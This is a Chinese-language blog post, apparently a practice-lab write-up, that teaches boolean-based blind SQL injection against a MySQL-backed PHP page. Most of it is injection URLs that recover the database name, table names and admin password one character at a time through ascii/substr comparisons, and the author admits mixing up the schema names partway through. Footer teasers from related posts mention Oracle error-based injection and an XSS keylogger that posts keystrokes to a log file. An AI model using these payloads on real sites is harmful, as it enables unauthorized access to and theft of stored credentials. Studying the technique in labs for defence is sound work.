大哥帶我們的mysql注入 基於bool的盲注

2022-03-18 19:07:33 字數 3817 閱讀 2100

盲注 那麼我們來了解一點盲注的語法

這裡面是語法的介紹

0x01第一步我們先判斷當前資料庫的長度

語法構造

/index.php?id=1%20and%20length((select%20database()))%3e3 正確

index.php?id=1 and length((select database()))>4 錯誤

那我們確定資料庫名字大於3不大於4 那麼資料庫長度就是4了

0x02爆資料庫名稱

www.php-sqli.net/index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3e1 正確

?id=1 and ascii(substr((select database()),1,1))>100 真確
id=1 and ascii(substr((select database()),1,1))>115正確

?id=1 and ascii(substr((select database()),1,1))>116 錯誤
那我們得到資料庫的第乙個位置的資料的ascii是116 =>t

繼續爆第二個

?id=1 and ascii(substr((select database()),2,1))>100 正確

?id=1 and ascii(substr((select database()),2,1))>101 錯誤
那麼第二個字母是 101=>e

繼續爆第三個

?id=1 and ascii(substr((select database()),3,1))>114 正確  

?id=1 and ascii(substr((select database()),3,1))>115 錯誤

第三個字母 115=> s

第四個

?id=1 and ascii(substr((select database()),4,1))>115 真確  

?id=1 and ascii(substr((select database()),4,1))>116 錯誤

第四個 => 116 t

那麼我們的資料庫的名稱應該是test

0x02爆表名

先判斷有多少個表

1' and (select count(*) from information_schema.tables where table_schem=database())>5#

這裡我不知道語法

然後第乙個表的長度

id=1 and length((select table_name from information_schema.tables where table_schema='

test

' limit 0,1))>4

這裡可以看見正確

id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>5 錯誤

那麼第乙個表長度為4

爆第乙個表的表名的第乙個字母

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='

security

' limit 0,1),1,1))>1 正確

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='

security

' limit 0,1),1,1))>100 正確

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='

security

' limit 0,1),1,1))>101 錯誤

那麼這裡我們知道表名的第乙個之母是101=>e

第二個字母的爆破

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='

security

' limit 0,1),2,1))>108 正確

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109 錯誤

那麼第二個字母 =>109  m

爆到這裡不爆了 大概是email

我們開始爆破第二個表

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='

security

' limit 1,1),1,1))>100 正確

id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114 錯誤

id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113 正確

第乙個字母是114=>r

不是admin不想要

第三個表

id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='

security

' limit 2,1),1,1))>116 正確

id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>117 錯誤

第乙個字母 117=> u

這個人肯定是users表 不多bb了盲注太煩了直接爆 列名

臥槽 庫名是test 我要寫成security 打錯特錯

0x03爆列名

操作和爆破表名的操作是一樣的

這裡我們爆破出來是 username 和password

0x04爆欄位

password

ascii(substr((select password from admin limit 0,1),1,1))>1
查內容 我們在查我們的密碼 在admin表裡面的password列裡面

大哥帶我們的mysql注入

這是今天的任務union select 查詢語句 第一步是先構造閉合 加入單引號報錯 然後 更據and 1 1 and1 2看是字元型還是布林型注入 www.薩達所大大所多t index.php?id 1 20order 20by 205 資料庫test查詢所有資料庫 要求是讀取web埠的admin...

大哥帶的Orchel資料庫的報錯注入

0x01 使用報錯注入需要使用類似 1 報錯語句 1 報錯語句 使用比較運算子,這樣的方式進行報錯注入 mysql僅使用函式報錯即可 類似mssql報錯注入的方式。news.jsp?id 1 and 1 1 正確news.jsp?id 1 and 1 2 錯誤 存在注入 隨便輸入 發現存在報錯資訊我...

大哥帶的XSS練習

0x01反射型 可以看見什麼都沒有過濾 0x02儲存型xss 那麼可以看見也是成功了 那我們試試可不可以順著網線搞一下組員吶?算了 沒得伺服器 搞搞自己吧 document.onkeypress function evt key post key logfile keylog.txt fp fope...